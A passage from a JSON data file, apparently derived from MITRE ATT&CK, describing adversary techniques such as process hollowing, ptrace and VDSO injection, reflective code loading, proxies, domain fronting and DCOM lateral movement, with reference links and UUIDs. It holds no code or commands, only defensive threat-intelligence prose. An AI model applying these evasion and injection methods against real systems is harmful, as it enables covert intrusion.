Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.013" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "5b841b56-6b47-4cec-bf80-71a9a51fa7a0", + "value": "Process Doppelgänging" + }, + { + "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.[[Leitch Hollowing](https://app.tidalcyber.com/references/8feb180a-bfad-42cb-b8ee-792c5088567a)][[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]\n\nThis is very similar to [Thread Local Storage](https://app.tidalcyber.com/technique/24e0b530-cca7-4c5c-83b2-97b83c716e42) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.012" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "77100337-67a1-4520-b25a-3ddd72b0d5ac", + "value": "Process Hollowing" + }, + { + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)][[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)][[DD Man](https://app.tidalcyber.com/references/f64bee0d-e37d-45d5-9968-58e622e89bfe)] \n\nOther techniques such as [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), proc memory injection may target child processes (such as a backgrounded copy of sleep).[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)] \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.009" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "7360117a-3404-48d0-9d4b-7f6a61c08f0e", + "value": "Proc Memory" + }, + { + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)] Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). [[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)][[Medium Ptrace JUL 2018](https://app.tidalcyber.com/references/6dbfe4b5-9430-431b-927e-e8e775874cd9)] \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.[[BH Linux Inject](https://app.tidalcyber.com/references/bdbb2a83-fc3b-439f-896a-75bffada4d51)] \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.008" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e200d4c9-2d9c-4303-a2de-86baae85c60f", + "value": "Ptrace System Calls" + }, + { + "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]\n\nThis is very similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.003" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "8e332106-dd58-4adc-927d-57d038af797c", + "value": "Thread Execution Hijacking" + }, + { + "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) techniques such as [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac).[[FireEye TLS Nov 2017](https://app.tidalcyber.com/references/9737055a-f583-448e-84d0-1d336c4da9a8)]\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.005" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "24e0b530-cca7-4c5c-83b2-97b83c716e42", + "value": "Thread Local Storage" + }, + { + "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://app.tidalcyber.com/technique/e200d4c9-2d9c-4303-a2de-86baae85c60f). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).[[ELF Injection May 2009](https://app.tidalcyber.com/references/3ca314d4-3fcf-4545-8ae9-4d8781d51295)][[Backtrace VDSO](https://app.tidalcyber.com/references/1c8fa804-6579-4e68-a0b3-d16e0bee5654)][[VDSO Aug 2005](https://app.tidalcyber.com/references/ae70f799-ebb6-4ffe-898e-945cb754c1cb)][[Syscall 2014](https://app.tidalcyber.com/references/4e8fe849-ab1a-4c51-b5eb-16fcd10e8bd0)]\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.014" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f060dcca-e7d2-4711-b5d1-41cffcb731b0", + "value": "VDSO Hijacking" + }, + { + "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "abccbb2a-2ea8-43b8-95dc-c583df300c07", + "type": "similar" + }, + { + "dest-uuid": "232bb95b-a267-4cc2-8eb1-67ecdd5babd5", + "type": "similar" + }, + { + "dest-uuid": "43d872bd-3d54-4ea3-bc89-a2f979db0d5a", + "type": "similar" + }, + { + "dest-uuid": "c262a10e-13db-4c47-995c-87201cdf858d", + "type": "similar" + }, + { + "dest-uuid": "2afcdcd1-ce55-4837-a84d-8279bc10f948", + "type": "similar" + }, + { + "dest-uuid": "5b841b56-6b47-4cec-bf80-71a9a51fa7a0", + "type": "similar" + }, + { + "dest-uuid": "77100337-67a1-4520-b25a-3ddd72b0d5ac", + "type": "similar" + }, + { + "dest-uuid": "7360117a-3404-48d0-9d4b-7f6a61c08f0e", + "type": "similar" + }, + { + "dest-uuid": "e200d4c9-2d9c-4303-a2de-86baae85c60f", + "type": "similar" + }, + { + "dest-uuid": "8e332106-dd58-4adc-927d-57d038af797c", + "type": "similar" + }, + { + "dest-uuid": "24e0b530-cca7-4c5c-83b2-97b83c716e42", + "type": "similar" + }, + { + "dest-uuid": "f060dcca-e7d2-4711-b5d1-41cffcb731b0", + "type": "similar" + } + ], + "uuid": "7a6208ac-c75e-4e73-8969-0aaf6085cb6e", + "value": "Process Injection" + }, + { + "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.[[SSH Tunneling](https://app.tidalcyber.com/references/13280f38-0f17-42d3-9f92-693f1da60ffa)] \n\n[Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) may also be abused by adversaries during [Dynamic Resolution](https://app.tidalcyber.com/technique/987ad3da-9423-4fe0-a52b-b931c0b8b95f). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.[[BleepingComp Godlua JUL19](https://app.tidalcyber.com/references/fd862d10-79bc-489d-a552-118014d01648)] \n\nAdversaries may also leverage [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) in conjunction with [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or [Protocol Impersonation](https://app.tidalcyber.com/technique/eb15320a-cd24-45b2-b23f-05ef8daf1039) to further conceal C2 communications and infrastructure. ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "bd677092-d197-4230-b94a-438cb24260fd", + "value": "Protocol Tunneling" + }, + { + "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. [[Fifield Blocking Resistent Communication through domain fronting 2015](https://app.tidalcyber.com/references/52671075-c425-40c7-a49a-b75e44a0c58a)] Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1090.004" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "12a5e66d-6a21-4e75-a201-97235698d67d", + "value": "Domain Fronting" + }, + { + "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. [[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)] Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1090.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "4c2c7469-0dbc-410f-891b-1040d4f2ff0b", + "value": "External Proxy" + }, + { + "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. [[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)] Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1090.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "8b744bfc-6bfb-45c5-8bb8-5b736ce7e634", + "value": "Internal Proxy" + }, + { + "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. [[Onion Routing](https://app.tidalcyber.com/references/0667caad-39cd-469b-91c0-1210c09e6041)]\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1090.003" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "fa05c148-56a0-43ae-b8e4-2d4e91641400", + "value": "Multi-hop Proxy" + }, + { + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. [[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)] Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "12a5e66d-6a21-4e75-a201-97235698d67d", + "type": "similar" + }, + { + "dest-uuid": "4c2c7469-0dbc-410f-891b-1040d4f2ff0b", + "type": "similar" + }, + { + "dest-uuid": "8b744bfc-6bfb-45c5-8bb8-5b736ce7e634", + "type": "similar" + }, + { + "dest-uuid": "fa05c148-56a0-43ae-b8e4-2d4e91641400", + "type": "similar" + } + ], + "uuid": "ba6a869a-c870-4be6-bc08-e078f0efdc3b", + "value": "Proxy" + }, + { + "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.[[Wikipedia Windows Registry](https://app.tidalcyber.com/references/656f0ffd-33e0-40ef-bdf7-70758f855f18)] Information can easily be queried using the [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "58722f84-b119-45a8-8e29-0065688015ee", + "value": "Query Registry" + }, + { + "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)][[S1 Custom Shellcode Tool](https://app.tidalcyber.com/references/f49bfd00-48d5-4d84-a7b7-cb23fcdf861b)][[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)][[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)][[Mandiant BYOL](https://app.tidalcyber.com/references/445efe8b-659a-4023-afc7-aa7cd21ee5a1)]\n\nReflective code injection is very similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)][[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)][[Intezer ACBackdoor](https://app.tidalcyber.com/references/e6cb833f-cf18-498b-a233-848853423412)][[S1 Old Rat New Tricks](https://app.tidalcyber.com/references/20ef3645-fb92-4e13-a5a8-99367869bcba)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ef85800b-080d-4739-9f3b-91b61314a93e", + "value": "Reflective Code Loading" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.[[Symantec Living off the Land](https://app.tidalcyber.com/references/4bad4659-f501-4eb6-b3ca-0359e3ba824e)][[CrowdStrike 2015 Global Threat Report](https://app.tidalcyber.com/references/50d467da-286b-45f3-8d5a-e9d8632f7bf1)][[CrySyS Blog TeamSpy](https://app.tidalcyber.com/references/f21ea3e2-7983-44d2-b78f-80d84bbc4f52)]\n\nRemote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n \nAdversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nInstallation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "acf828f4-7e7e-43e1-bf15-ceab42021430", + "value": "Remote Access Software" + }, + { + "description": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. \n\nMany enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5)), using commands such as Connect-AZAccount for Azure PowerShell, Connect-MgGraph for Microsoft Graph PowerShell, and gcloud auth login for the Google Cloud CLI.\n\nIn some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) instead of a username and password. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.007" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "351a3ac7-bf0f-5dc1-b090-5a3d3586f31d", + "value": "Cloud Services" + }, + { + "description": "Adversaries may leverage [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5), such as Azure Serial Console[[Azure Serial Console](https://app.tidalcyber.com/references/fd75d136-e818-5233-b2c2-5d8ed033b9e6)], AWS EC2 Instance Connect[[EC2 Instance Connect](https://app.tidalcyber.com/references/deefa5b7-5a28-524c-b500-bc5574aa9920)][[lucr-3: Getting SaaS-y in the cloud](https://app.tidalcyber.com/references/033e7c95-cded-5e51-9a9f-1c6038b0509f)], and AWS System Manager.[[AWS System Manager](https://app.tidalcyber.com/references/a7813928-4351-54c5-a64e-61bd4689e93b)].\n\nMethods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. \n\nAdversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)] These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://app.tidalcyber.com/technique/944a7b91-c58e-567d-9e2c-515b93713c50)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1021.008" + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "852bc9a9-865f-59cd-9e81-bec6e8aa8b78", + "value": "Direct Cloud VM Connections" + }, + { + "description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)][[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.[[Microsoft Process Wide Com Keys](https://app.tidalcyber.com/references/749d83a9-3c9f-42f4-b5ed-fa775b079716)] By default, only Administrators may remotely activate and launch COM objects through DCOM.[[Microsoft COM ACL](https://app.tidalcyber.com/references/88769217-57f1-46d4-977c-2cb2969db437)]\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications[[Enigma Outlook DCOM Lateral Movement Nov 2017](https://app.tidalcyber.com/references/48c8b8c4-1ce2-4fbc-a95d-dc8b39304200)] as well as other Windows objects that contain insecure methods.[[Enigma MMC20 COM Jan 2017](https://app.tidalcyber.com/references/ecc1023d-ef37-46e3-8dce-8fd5bb6a10dc)][[Enigma DCOM Lateral Movement Jan 2017](https://app.tidalcyber.com/references/62a14d3b-c61b-4c96-ad28-0519745121e3)] DCOM can also execute macros in existing documents[[Enigma Excel DCOM Sept 2017](https://app.tidalcyber.com/references/953dc856-d906-4d87-a421-4e708f30208c)] and may also invoke [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) (DDE) execution directly through a COM created instance of a Microsoft Office application[[Cyberreason DCOM DDE Lateral Movement Nov 2017](https://app.tidalcyber.com/references/6edb3d7d-6b74-4dc4-a866-b81b19810f97)], bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). [[MSDN 